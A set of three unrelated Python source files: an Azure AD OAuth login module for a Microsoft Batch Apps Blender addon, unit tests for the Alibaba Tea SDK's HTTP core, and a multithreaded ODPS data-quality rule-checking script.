if __name__ == "__main__":
main()
|
auth.py | #-------------------------------------------------------------------------
#
# Batch Apps Blender Addon
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
import bpy
import webbrowser
import logging
import threading
from http.server import HTTPServer
from urllib.parse import unquote
from batchapps_blender.utils import (
BatchAppsOps,
OAuthRequestHandler)
from batchapps_blender.ui import ui_auth
from batchapps_blender.props import props_auth
from batchapps import AzureOAuth
from batchapps.exceptions import (
AuthenticationException,
InvalidConfigException)
TIMEOUT = 60 # 1 minute
class BatchAppsAuth(object):
"""
    Manages authentication of the session for the BatchApps Blender Addon.
Will attempt to sign in automatically based on data available in the
    Batch Apps configuration. If unsuccessful, will prompt the user to sign in
via a web browser.
"""
pages = ["LOGIN", "REDIRECT"]
def __init__(self):
self.ops = self._register_ops()
self.props = self._register_props()
self.ui = self._register_ui()
def display(self, ui, layout):
"""
Invokes the corresponding ui function depending on the session's
current page.
:Args:
- ui (blender :class:`.Interface`): The instance of the Interface
panel class.
- layout (blender :class:`bpy.types.UILayout`): The layout object,
derived from the Interface panel. Used for creating ui
components.
:Returns:
- Runs the display function for the applicable page.
"""
return self.ui[bpy.context.scene.batchapps_session.page](ui, layout)
def _register_props(self):
"""
Registers and retrieves the auth property objects.
These properties are assigned to the scene.batchapps_auth context.
:Returns:
- :class:`.AuthProps`
"""
props = props_auth.register_props()
return props
def _register_ops(self):
"""
Registers each auth operator with a batchapps_auth prefix.
:Returns:
- A list of the names (str) of the registered auth operators.
"""
ops = []
ops.append(BatchAppsOps.register("auth.login",
"Login",
self._login))
ops.append(BatchAppsOps.register("auth.logout",
"Logout",
self._logout))
ops.append(BatchAppsOps.register("auth.redirect",
"Redirecting authentication",
modal=self._redirect_modal,
invoke=self._redirect_invoke,
_timer=None))
return ops
def _register_ui(self):
"""
Matches the login and redirection pages with their corresponding
ui functions.
:Returns:
- A dictionary mapping the page name to its corresponding
ui function.
"""
def get_auth_ui(name):
name = name.lower()
return getattr(ui_auth, name)
page_func = map(get_auth_ui, self.pages)
return dict(zip(self.pages, page_func))
def _redirect_modal(self, op, context, event):
"""
The modal method for the auth.redirect operator to handle running
the authentication redirection server in a separate thread to
prevent the blocking of the Blender UI.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
- event (:class:`bpy.types.Event`): The blender invocation event.
:Returns:
- If the thread has completed, the Blender-specific value
{'FINISHED'} to indicate the operator has completed its action.
- Otherwise the Blender-specific value {'RUNNING_MODAL'} to
              indicate the operator will continue to process after the
completion of this function.
"""
if event.type == 'TIMER':
context.scene.batchapps_session.log.debug("AuthThread complete.")
if not self.props.thread.is_alive():
context.window_manager.event_timer_remove(op._timer)
return {'FINISHED'}
return {'RUNNING_MODAL'}
def _redirect_invoke(self, op, context, event):
"""
The invoke method for the auth.redirect operator.
Starts the authentication redirect thread.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
- event (:class:`bpy.types.Event`): The blender invocation event.
:Returns:
- Blender-specific value {'RUNNING_MODAL'} to indicate the operator
              will continue to process after the completion of this function.
"""
self.props.thread.start()
context.scene.batchapps_session.log.debug("AuthThread initiated.")
context.window_manager.modal_handler_add(op)
op._timer = context.window_manager.event_timer_add(1, context.window)
return {'RUNNING_MODAL'}
def _login(self, op, context, *args):
"""
The execute method for the auth.login operator.
        Sets the function to be performed by the authentication thread and
updates the session page to "REDIRECT" while the thread executes.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
:Returns:
- Blender-specific value {'FINISHED'} to indicate the operator has
completed its action.
"""
auth_thread = lambda: BatchAppsOps.session(self.web_authentication)
self.props.thread = threading.Thread(name="AuthThread",
target=auth_thread)
bpy.ops.batchapps_auth.redirect('INVOKE_DEFAULT')
if context.scene.batchapps_session.page == "LOGIN":
context.scene.batchapps_session.page = "REDIRECT"
return {'FINISHED'}
def _logout(self, op, context, *args):
"""
The execute method for the auth.logout operator.
Clears any cached credentials and resets the session page back to the
Login screen.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
:Returns:
- Blender-specific value {'FINISHED'} to indicate the operator has
completed its action.
"""
if self.props.credentials:
try:
self.props.credentials.clear_auth()
except OSError:
pass
self.props.credentials = None
bpy.context.scene.batchapps_session.page = "LOGIN"
bpy.context.scene.batchapps_session.log.info(
"Logged out. Cached sessions cleared.")
return {'FINISHED'}
def auto_authentication(self, cfg, log):
"""
Attempts to authenticate automatically by first searching the Batch Apps
configuration for an unattended session, then a cached session.
:Args:
- cfg (:class:`batchapps.Configuration`): An instance of the Batch
Apps Configuration class, read from the file set in the addon
User Preferences.
- log (:class:`batchapps.log.PickleLog`): A logger object as set in
BatchAppsSettings.
:Returns:
- ``True`` if the addon was successfully authenticated,
else ``False``
"""
try:
log.info("Checking for unattended session...")
self.props.credentials = AzureOAuth.get_unattended_session(config=cfg)
log.info("Found!")
return True
except (AuthenticationException, InvalidConfigException) as exp:
log.info("Could not get unattended session: {0}".format(exp))
try:
log.info("Checking for cached session...")
self.props.credentials = AzureOAuth.get_session(config=cfg)
log.info("Found!")
return True
except (AuthenticationException, InvalidConfigException) as exp:
log.info("Could not get cached session: {0}".format(exp))
return False
def wait_for_request(self):
"""
Once the user has been prompted to authenticate in a web browser
session, start a basic HTTPServer to intercept the AAD redirect call
to collect the server response to the auth request.
The localhost redirect URL will depend on how the client is set up in
the AAD portal.
The server has a timeout of 1 minute.
"""
session = bpy.context.scene.batchapps_session
self.props.code=None
config = bpy.context.scene.batchapps_session.cfg
redirect = config.aad_config()['redirect_uri'].split(':')
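        # the configured redirect_uri is expected in 'host:port' form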
server_address = (redirect[0], int(redirect[1]))
web_server = HTTPServer(server_address, OAuthRequestHandler)
session.log.debug("Created web server listening at: {0}, {1}.".format(
redirect[0], int(redirect[1])))
web_server.timeout = TIMEOUT
web_server.handle_request()
web_server.server_close()
session.log.debug("Closed server.")
def open_websession(self):
"""
Open a web browser session to prompt the user to authenticate via their
AAD credentials.
This method of authentication is the 'last resort' after
auto-authentication and unattended authentication have failed.
:Raises:
- :class:`RuntimeError` if authentication fails, which will fail
the loading of the addon as all auth routes have failed. This
could be due to either an
              :class:`batchapps.exceptions.AuthenticationException` or a
:class:`batchapps.exceptions.InvalidConfigException`.
"""
session = bpy.context.scene.batchapps_session
try:
url, state = AzureOAuth.get_authorization_url(config=session.cfg)
webbrowser.open(url)
session.log.info("Opened web browser for authentication "
"and waiting for response.")
self.wait_for_request()
except (AuthenticationException, InvalidConfigException) as exp:
session.log.error("Unable to open Web UI auth session: "
"{0}".format(exp))
raise RuntimeError("Failed to authorize addon")
def decode_error(self, val):
"""
Format the auth redirect URL to extract the auth code.
:Args:
- val (str): The redirect URL.
:Returns:
- The auth code (str).
"""
error_idx = self.props.code.find(val)
if error_idx < 0:
return None
strt_idx = error_idx + len(val)
end_idx = self.props.code.find('&', strt_idx)
error_val = self.props.code[strt_idx:end_idx]
return unquote(error_val)
def web_authentication(self):
"""
Prompts user to authenticate via a web browser session, after
auto-authentication and unattended authentication have failed.
If web authentication is successful, the session (i.e. refresh token)
will be cached to enable auto-authentication next time the addon is
used. Session page will be set to the HOME page.
        If unsuccessful, the addon will fail to load and the ERROR page will
        be displayed. Error details will be logged to the console.
"""
session = bpy.context.scene.batchapps_session
if self.auto_authentication(session.cfg, session.log):
session.start(self.props.credentials)
session.page = "HOME"
session.redraw()
return
self.open_websession()
if not self.props.code:
session.log.warning("Log in timed out - please try again.")
session.page = "LOGIN"
elif '/?error=' in self.props.code:
error = self.decode_error('/?error=')
details = self.decode_error(
'&error_description=').replace('+', ' ')
session.log.error("Authentication failed: {0}".format(error))
session.log.error(details)
session.page = "ERROR"
else:
session.log.info(
"Received valid authentication response from web browser.")
session.log.info("Now retrieving new authentication token...")
self.props.credentials = AzureOAuth.get_authorization_token(
self.props.code, config=session.cfg)
session.start(self.props.credentials)
session.log.info("Successful! Login complete.")
session.redraw() |
test_core.py | import unittest
import time
import asyncio
from unittest import mock
from requests.exceptions import ProxyError
from Tea.vendored.aiohttp.client_exceptions import ClientProxyConnectionError
from Tea.model import TeaModel
from Tea.core import TeaCore
from Tea.request import TeaRequest
from Tea.exceptions import TeaException, RetryError
from Tea.stream import BaseStream
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
class Request(BaseHTTPRequestHandler):
def do_POST(self):
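        # echo the posted body back inside a small JSON object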
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
body = self.rfile.read(int(self.headers['content-length']))
self.wfile.write(b'{"result": "%s"}' % body)
def run_server():
server = HTTPServer(('localhost', 8888), Request)
server.serve_forever()
class TeaStream(BaseStream):
def __init__(self):
super().__init__()
self.content = b'tea test'
def read(self, size=1024):
content = self.content
self.content = b''
return content
def __len__(self):
return len(b'tea test')
def __next__(self):
content = self.read()
if content:
return content
else:
raise StopIteration
class BaseUserResponse(TeaModel):
def __init__(self):
self.avatar = None
self.createdAt = None
self.defaultDriveId = None
self.description = None
self.domainId = None
self.email = None
self.nickName = None
self.phone = None
self.role = None
self.status = None
self.updatedAt = None
self.userId = None
self.userName = None
self.array = None
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
return {
'avatar': self.avatar,
'createdAt': self.createdAt,
'defaultDriveId': self.defaultDriveId,
'description': self.description,
'domainId': self.domainId,
'email': self.email,
'nickName': self.nickName,
'phone': self.phone,
'role': self.role,
'status': self.status,
'updatedAt': self.updatedAt,
'userId': self.userId,
'userName': self.userName,
}
def from_map(self, map=None):
dic = map or {}
self.avatar = dic.get('avatar')
self.createdAt = dic.get('createdAt')
self.defaultDriveId = dic.get('defaultDriveId')
self.description = dic.get('description')
self.domainId = dic.get('domainId')
self.email = dic.get('email')
self.nickName = dic.get('nickName')
self.phone = dic.get('phone')
self.role = dic.get('role')
self.status = dic.get('status')
self.updatedAt = dic.get('updatedAt')
self.userId = dic.get('userId')
self.userName = dic.get('userName')
self.array = []
if dic.get('array') is not None:
for i in dic.get('array'):
self.array.append(i)
return self
class ListUserResponse(TeaModel):
def __init__(self):
super().__init__()
self.items = None
self.nextMarker = None
@classmethod
def names(cls):
return {
"items": "items",
"nextMarker": "next_marker",
}
@classmethod
def requireds(cls):
return {
"items": False,
"nextMarker": False,
}
class TestCore(unittest.TestCase):
@classmethod
def setUpClass(cls):
server = threading.Thread(target=run_server)
server.daemon = True
server.start()
def test_compose_url(self):
request = TeaRequest()
try:
TeaCore.compose_url(request)
except Exception as e:
self.assertEqual('"endpoint" is required.', str(e))
request.headers['host'] = "fake.domain.com"
self.assertEqual("http://fake.domain.com",
TeaCore.compose_url(request))
request.headers['host'] = "http://fake.domain.com"
self.assertEqual("http://fake.domain.com",
TeaCore.compose_url(request))
request.port = 8080
self.assertEqual("http://fake.domain.com:8080",
TeaCore.compose_url(request))
request.pathname = "/index.html"
self.assertEqual("http://fake.domain.com:8080/index.html",
TeaCore.compose_url(request))
request.query["foo"] = ""
self.assertEqual("http://fake.domain.com:8080/index.html?foo=",
TeaCore.compose_url(request))
request.query["foo"] = "bar"
self.assertEqual("http://fake.domain.com:8080/index.html?foo=bar",
TeaCore.compose_url(request))
request.pathname = "/index.html?a=b"
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
request.pathname = "/index.html?a=b&"
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
request.query["fake"] = None
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
def test_do_action(self):
request = TeaRequest()
request.headers['host'] = "www.alibabacloud.com"
request.pathname = "/s/zh"
request.query["k"] = "ecs"
option = {
"readTimeout": 20000,
"connectTimeout": 10000,
"httpProxy": None,
"httpsProxy": None,
"noProxy": None,
"maxIdleConns": None,
"retry": {
"retryable": None,
"maxAttempts": None
},
"backoff": {
"policy": None,
"period": None
},
'debug': 'sdk',
"ignoreSSL": None
}
resp = TeaCore.do_action(request, option)
self.assertTrue(resp.headers.get('server'))
self.assertIsNotNone(bytes.decode(resp.body))
option['httpProxy'] = '127.0.0.1'
option['httpsProxy'] = '127.0.0.1'
option['noProxy'] = '127.0.0.1'
try:
TeaCore.do_action(request, option)
assert False
except Exception as e:
self.assertIsInstance(e, RetryError)
def test_async_do_action(self):
request = TeaRequest()
request.headers['host'] = "www.alibabacloud.com"
request.protocol = 'https'
request.pathname = "/s/zh"
request.query["k"] = "ecs"
option = {
"readTimeout": 20000,
"connectTimeout": 10000,
"httpProxy": None,
"httpsProxy": None,
"noProxy": None,
"maxIdleConns": None,
"retry": {
"retryable": None,
"maxAttempts": None
},
"backoff": {
"policy": None,
"period": None
},
"ignoreSSL": None
}
loop = asyncio.get_event_loop()
task = asyncio.ensure_future(
TeaCore.async_do_action(request, option)
)
loop.run_until_complete(task)
response = task.result()
self.assertTrue(response.headers.get('server'))
self.assertIsNotNone(bytes.decode(response.body))
request.protocol = 'http'
option['httpProxy'] = 'http://127.0.0.1'
try:
loop.run_until_complete(TeaCore.async_do_action(request, option))
assert False
except Exception as e:
self.assertIsInstance(e, RetryError)
def test_get_response_body(self):
moc_resp = mock.Mock()
moc_resp.content = "test".encode("utf-8")
self.assertEqual("test", TeaCore.get_response_body(moc_resp))
def test_allow_retry(self):
self.assertFalse(TeaCore.allow_retry(None, 0))
dic = {}
self.assertFalse(TeaCore.allow_retry(dic, 0))
dic["retryable"] = True
dic["maxAttempts"] = 3
self.assertTrue(TeaCore.allow_retry(dic, 0))
self.assertFalse(TeaCore.allow_retry(dic, 4))
dic["maxAttempts"] = None
self.assertFalse(TeaCore.allow_retry(dic, 1))
dic["retryable"] = False
dic["maxAttempts"] = 3
self.assertTrue(TeaCore.allow_retry(dic, 0))
self.assertFalse(TeaCore.allow_retry(dic, 1))
def test_get_backoff_time(self):
dic = {}
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = None
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = ""
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = "no"
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = "yes"
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["period"] = None
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["period"] = -1
self.assertEqual(1, TeaCore.get_backoff_time(dic, 1))
dic["period"] = 1000
self.assertEqual(1000, TeaCore.get_backoff_time(dic, 1))
def test_sleep(self):
ts_before = int(round(time.time() * 1000))
TeaCore.sleep(1)
ts_after = int(round(time.time() * 1000))
ts_subtract = ts_after - ts_before
self.assertTrue(1000 <= ts_subtract < 1100)
def test_is_retryable(self):
self.assertFalse(TeaCore.is_retryable("test"))
ex = TeaException({})
self.assertFalse(TeaCore.is_retryable(ex))
ex = RetryError('error')
self.assertTrue(TeaCore.is_retryable(ex))
def test_bytes_readable(self):
body = "test".encode('utf-8')
self.assertIsNotNone(TeaCore.bytes_readable(body))
def test_merge(self):
model = BaseUserResponse()
dic = TeaCore.merge(model, {'k1': 'test'})
self.assertEqual(
{
'avatar': None,
'createdAt': None,
'defaultDriveId': None,
'description': None,
'domainId': None,
'email': None,
'nickName': None,
'phone': None,
'role': None,
'status': None,
'updatedAt': None,
'userId': None,
'userName': None,
'k1': 'test'
}, dic
)
def test_to_map(self):
model = BaseUserResponse()
model.phone = '139xxx'
model.domainId = 'domainId'
m = TeaCore.to_map(model)
self.assertEqual('139xxx', m['phone'])
self.assertEqual('domainId', m['domainId'])
m = TeaCore.to_map(None)
self.assertEqual({}, m)
model = BaseUserResponse()
model._map = {'phone': '139xxx'}
m = TeaCore.to_map(model)
self.assertEqual({'phone': '139xxx'}, m)
def test_from_map(self):
model = BaseUserResponse()
model.phone = '139xxx'
model.domainId = 'domainId'
m = {
'phone': '138',
'domainId': 'test'
}
model1 = TeaCore.from_map(model, m)
self.assertEqual('138', model1.phone)
self.assertEqual('test', model1.domainId)
m = {
'phone': '138',
'domainId': 'test',
'array': 123
}
model2 = TeaCore.from_map(model, m)
self.assertEqual([], model2.array)
self.assertEqual(123, model2._map['array'])
def test_async_stream_upload(self):
request = TeaRequest()
request.method = 'POST'
request.protocol = 'http'
request.headers['host'] = "127.0.0.1:8888"
loop = asyncio.get_event_loop()
f = TeaStream()
request.body = f
task = asyncio.ensure_future(TeaCore.async_do_action(request))
loop.run_until_complete(task)
self.assertEqual(b'{"result": "tea test"}', task.result().body)
|
py_two_stage_rule_check_v0_copy.98_2 copy.py | # -*- coding:utf-8 -*-
# @Time : 2020/07/19
# @Author : WangHongGang
# @File : py_two_stage_rule_check
# Code update to version 0.98_1 by WangHongGang 20200730
# 1. Redesigned the query statements and created the new result table s_rwgl_zxjg_new; the original execution approach is discarded.
# Code update to version 0.98_2 by WangHongGang 20210117
# 1. Redesigned the execution logic of the _run_check() function:
#    a. dropped the primary-key check; the primary key is no longer tested for being empty
#    b. added key-field checks to the main SQL, producing one cnt_wtms_<field_name> result per field
#    c. all cnt_wtms_<field_name> results are merged into a cnt_wtms value, a string of the form 'cnt_wtms_<field>:<count>,cnt_wtms_<field>:<count>'
# 2. Added a cnt_wtms column (type str) after the wts column of the result table; it is written by _write_result()
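# Illustrative note (hypothetical field names): with bzxz = 'phone,email', _run_check()
# below rewrites a rule's SQL roughly as
#     select provincial_id dsbm, wts, cnt_wtms_phone, cnt_wtms_email from (
#         select provincial_id, COUNT(1) wts, count(wtms_phone) cnt_wtms_phone,
#                count(wtms_email) cnt_wtms_email from ... group by provincial_id
#     ) table_final
# assuming the rule SQL selects provincial_id first and defines wtms_<field> expressions.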
import time
import datetime
import threading
from Queue import Queue
import contextlib
import uuid
# import sys
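# NOTE: `odps` and `options` are used below but never imported; they appear to be
# injected by the PyODPS/DataWorks runtime that executes this script. Likewise,
# get_sec_time(), stop_thread(), GZ_STATUS_Q, DEV_MODE, TERMINATE_TIME and
# _THREAD_CHECK_INTERVAL are referenced in thread_check() but must be defined
# elsewhere in the execution environment.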
class ThreadPool(object):
def __init__(self, max_num):
self.StopEvent = 0
self.q = Queue()
self.max_num = max_num
self.terminal = False
self.created_list = []
self.free_list = []
self.Deamon = False
# change args into *args
def run(self, func, args=None, callback=None):
task = (func, args, callback)
self.q.put(task)
if len(self.free_list) == 0 and len(self.created_list) < self.max_num:
self.create_thread()
def create_thread(self):
t = threading.Thread(target=self.call)
# t.setDaemon(self.Deamon)
t.start()
self.created_list.append(t)
def call(self):
current_thread = threading.current_thread()
event = self.q.get()
while event != self.StopEvent:
func, arguments, callback = event
try:
# print(current_thread, func)
result = func(*arguments)
func_execute_status = True
except Exception as e:
func_execute_status = False
result = None
print('Task function raised an error: '),
print(e)
if func_execute_status:
if callback is not None:
try:
callback(result)
except Exception as e:
print('Callback function raised an error: '),
print(e)
with self.worker_state(self.free_list, current_thread):
if self.terminal:
event = self.StopEvent
else:
event = self.q.get()
else:
self.created_list.remove(current_thread)
# print(current_thread, 'is closed!!! {} threads remain!!'.format(len(self.created_list)))
def close(self):
full_size = len(self.created_list)
while full_size:
self.q.put(self.StopEvent)
full_size -= 1
def terminate(self):
self.terminal = True
while self.created_list:
self.q.put(self.StopEvent)
self.q.queue.clear()
def join(self):
for t in self.created_list:
t.join()
@contextlib.contextmanager
def worker_state(self, state_list, worker_thread):
state_list.append(worker_thread)
try:
yield
finally:
state_list.remove(worker_thread)
def get_time():
return datetime.datetime.now()
def yesterday_str():  # yesterday's date
# today = datetime.datetime.now()
oneday = datetime.timedelta(days=1)
yesterday = TODAY - oneday
str_yesterday = yesterday.strftime('%Y%m%d')
return str_yesterday
def before_yesterday_str():  # the day before yesterday's date
# today = datetime.datetime.now()
twoday = datetime.timedelta(days=2)
before_yesterday = TODAY - twoday
str_before_yesterday = before_yesterday.strftime('%Y%m%d')
return str_before_yesterday
class Rule(object):
def __init__(self, rule_detail_table_name, max_threads_num = 1):
self.rule_detail_table_name = rule_detail_table_name
self.rules = []
self.rwid = TODAY.strftime('%Y%m%d%H%M%S')
self.pool = ThreadPool(max_threads_num)
print("**********RWID is: {} **********".format(self.rwid))
def go(self):
self._read_rule()
for rule in self.rules:
# self.pool.run(func=self._run_check, args=(rule,),)
# after changing, take away ,
self.pool.run(func=self._run_check, args=(rule,),)
self.pool.close()
self.pool.join()
def _read_rule(self):  # read the rule table
# print('Starting read rules....')
rule_detail_table_name = self.rule_detail_table_name
# _sql_str = '''
# select * from {0} where bbh not in ('a3f4c2e0-53f4-475c-be77-0436746a079f','0ca8332a-7dce-411f-a1b8-8548ecf501b1') order by id;
# '''.format(rule_detail_table_name)
_sql_str = 'select * from {0} where bbh in (select gzid from PRO_ADS_QUALITYRULE_DEV.s_gzid_list_tbl) order by id'.format(
rule_detail_table_name)
rules = []
with odps.execute_sql(_sql_str).open_reader() as target_reader:
for _record in target_reader:
_tmp_rule = {}
_is_empty = False
if _record['xfbz'] != '0':
continue
for rule in _record:
_key = rule[0].strip().encode('utf-8').lower()
_value = rule[1]
if _key == 'id' and (_value is None or _value == ''):
# id is empty -> skip this rule
_is_empty = True
break
elif _key == 'bbh' and (_value is None or _value == ''):
# bbh is empty -> skip this rule
_is_empty = True
break
elif _value is None or _value == '':
_tmp_rule[_key] = ''
else:
_tmp_rule[_key] = _value.strip().encode('utf-8')
if not _is_empty:
rules.append(_tmp_rule)
self.rules = rules
# print('Read rules completed!')
def _run_check(self, rule):
_ct = threading.current_thread()
#print'Start Check rule... ', rule['bbh'], get_time(),_ct
print "Start Check rule... %s %s %s"%(rule['bbh'],get_time(),_ct)
sql = rule['sql']
sumsql = rule['sumsql']
xfbz = rule['xfbz']
wtsql_wt_id = rule['wtsql_wt_id']
gzid = rule['bbh']
table_name = rule['table_name']
bzxz = rule['bzxz']
rwid = self.rwid
ksrq = get_time()
# needed_dt = '20200726'
needed_dt = YESTERDAY_STR
sql = sql.replace('\xef\xbc\x8c', ',')
sql = sql.replace('getdate()', "to_date({}, 'yyyymmdd')".format(needed_dt))
sql = sql.replace('GETDATE()', "to_date({}, 'yyyymmdd')".format(needed_dt))
# NOTE: because getdate() is replaced with needed_dt, the effective date depends on the value of needed_dt. For example, if needed_dt is yesterday, the run actually covers yesterday-1, i.e. the day before yesterday.
# # test
# self.rwid = rwid = '20200729160000'
# print("RWID is: {}".format(self.rwid))
# wtsql_wt_id = 'bbh,xfbz'
# sql = """
# select provincial_id,bbh,xfbz,table_name from(
# select id provincial_id, bbh,xfbz,table_name from S_YWGZ_GZMX limit 10) a
# """
# # test
result = []
memo = ''
zt = 'Successed'
_sql_str = sql.lower()
_cnt_wts_str = ' COUNT(1) wts'
org_cnt_ids = []
if bzxz is None:
bzxz = ''
bzxz = bzxz.lower()
bzxz = bzxz.replace('\xef\xbc\x8c', ',')
bzxz = bzxz.replace(' ', '')
org_cnt_ids = bzxz.split(',')
cnt_ids = []
_cnt_sql = ''
_cnt_ids_str = ''
if bzxz != '':
for _cnt_id in org_cnt_ids:
# cnt_ids.append('cnt_wtms_' + _cnt_id)
cnt_ids.append('cnt_wtms_' + _cnt_id)
_tmp_ids_str = 'wtms_' + _cnt_id
_tmp_cnt_ids_str = 'cnt_' + _tmp_ids_str +', '
_tmp_cnt_sql = 'count({}) {}'.format(_tmp_ids_str, _tmp_cnt_ids_str)
_cnt_sql += _tmp_cnt_sql
_cnt_ids_str += _tmp_cnt_ids_str
_cnt_sql = ', ' + _cnt_sql[:-2]
_cnt_ids_str = ', ' + _cnt_ids_str[:-2]
i = _sql_str.find(',') + 1
j = _sql_str.find('from')
sql = sql[:i] + _cnt_wts_str + _cnt_sql + ' ' + sql[j:] + ' group by provincial_id'
_sql_str = """
select provincial_id dsbm, wts{cnt_ids} from ({sql}) table_final
""".format(cnt_ids=_cnt_ids_str, sql=sql)
sql = _sql_str
try:
_line_num = 0
with odps.execute_sql(sql).open_reader() as reader:
#print 'Executing rule: %s, instance id: %s' % (gzid, sql_instance1.id)
for record in reader:
_line_num += 1
# Fix 20201231 (WHG): if provincial_id contains a NULL value, the current rule run is marked failed
# and 'provincial_id is None' is recorded
if record['dsbm'] is None:
zt = 'Failed'
memo = 'provincial_id is None'
result.append([table_name, '', 0, '', ''])
break
_dsbm = record['dsbm'].encode('utf-8').strip()
_wts = record['wts']
_cnt_wtms = ''
for _tmp_cnt_id in cnt_ids:
_tmp_cnt_wtms = str(record[_tmp_cnt_id])
# _cnt_wtms = _tmp_cnt_wtms + ':' + _tmp_cnt_id
_tmp_cnt_id = _tmp_cnt_id[9:]
result.append([table_name, _dsbm, _wts, _tmp_cnt_id, _tmp_cnt_wtms])
# _cnt_wtms = _cnt_wtms[:-1]
if _line_num == 0:
zt = 'Nodata'
result.append([table_name, '', 0, '', ''])
except Exception as e:
zt = 'Failed'
#sql_instance1.stop()
memo = str(e)
result.append([table_name, '', 0, '', ''])
# print('Got Error: ', e, 'sql:',sumsql, 'gzid:', gzid)
jsrq = get_time()
for line in result:
line.append(ksrq)
line.append(jsrq)
line.append(zt)
line.append(memo)
print(result)
self._write_result(result, gzid)
def _write_result(self, write_data, gzid):
ct = threading.current_thread()
# print("Writing result....", gzid, get_time(), ct)
for line in write_data:
id_str = str(uuid.uuid1())
line.insert(0,gzid)
line.insert(0,id_str)
pt_str = 'rwid=' + self.rwid
result_table_name = TABLE_PROJECT_SPACE + '.' +S_RWGL_ZXJG
try:
tgt_table = odps.get_table(result_table_name)
if not tgt_table.exist_partition(pt_str):
tgt_table.create_partition(pt_str, if_not_exists=True)
with tgt_table.open_writer(partition=pt_str) as writer:
writer.write(write_data)
except Exception as e:
print('Write error: '),
print(gzid),
print(e)
print "Write complete... ", gzid,get_time(), ct
def thread_check(q, pool, time_limit=5):
time.sleep(10)
global TERMINATE_TIME
cts = []
ct = q.get()
cts.append([ct, get_sec_time()])
def _stop_all():
print('!!!Stop all process cause TERMINATE_TIME!!!')
pool.q.queue.clear()
full_size = pool.max_num
while full_size:
pool.q.put(pool.StopEvent)
full_size -= 1
time.sleep(1)
for t in pool.created_list:
stop_thread(t)
q.queue.clear()
GZ_STATUS_Q.queue.clear()
return
while True:
print('\nThread check new circle...')
# Fix 20200828: added the ability to force-stop the program at a specified time
if DEV_MODE:
if TERMINATE_TIME:
time.sleep(5)
TERMINATE_TIME = get_time().strftime('%H:%M:%S')
else:
TERMINATE_TIME = None
if TERMINATE_TIME is not None:
if len(TERMINATE_TIME) == 8:
_cur_time = time.strptime(get_time().strftime('%H:%M:%S'), '%H:%M:%S')
_terminate_time = time.strptime(TERMINATE_TIME, '%H:%M:%S')
if _cur_time >= _terminate_time:
_stop_all()
break
elif len(TERMINATE_TIME) == 19:
_cur_time = time.strptime(get_time().strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S')
_terminate_time = time.strptime(TERMINATE_TIME, '%Y-%m-%d %H:%M:%S')
if _cur_time >= _terminate_time:
_stop_all()
break
else:
print('TERMINATE_TIME format error!')
TERMINATE_TIME = None
###########################################
while not q.empty():
ct = q.get()
cts.append([ct, get_sec_time()])
if len(cts) == 1:
if cts[0][0] == 0:
break
print('Running thread in pool: ')
for ct in cts:
if ct[0] != 0:
continued_time = int(get_sec_time() - ct[1])
print('{} continue time: {}'.format(ct, continued_time))
if continued_time > time_limit:
print('killing thread {0}, running over {1} secs.'.format(ct, continued_time))
stop_thread(ct[0])
time.sleep(1)
try:
cts.remove(ct)
except:
pass
elif not ct[0].isAlive():
try:
cts.remove(ct)
except:
pass
# print('Running thread in pool: ')
for t in pool.created_list:
# print(t)
if not t.isAlive():
try:
# print('remove thread...', t)
pool.created_list.remove(t)
except:
pass
n = pool.max_num - len(pool.created_list)
if n > 0:
# print('add new thread...')
for i in range(0, n):
pool.create_thread()
# print('Pool created_list: ', len(pool.created_list))
time.sleep(_THREAD_CHECK_INTERVAL)
print('Thread check is closing...')
GZ_STATUS_Q.put(0)
q.put('Stoped')
def main(max_threads_num):
start_time = get_time()
print '**********Job Starting!!!', start_time ,'**********'
rule_table_name = TABLE_PROJECT_SPACE + '.' + S_YWGZ_GZMX
r = Rule(rule_table_name, max_threads_num)
r.go()
finish_time = get_time()
print 'Job Finished!!!', finish_time
print 'Job total cost time: {}'.format(finish_time - start_time)
TODAY = datetime.datetime.now()
TODAY_STR = TODAY.strftime('%Y%m%d')
YESTERDAY_STR = yesterday_str()
DEV_TABLE_PROJECT_SPACE = 'PRO_ADS_QUALITYRULE_DEV'  # development environment
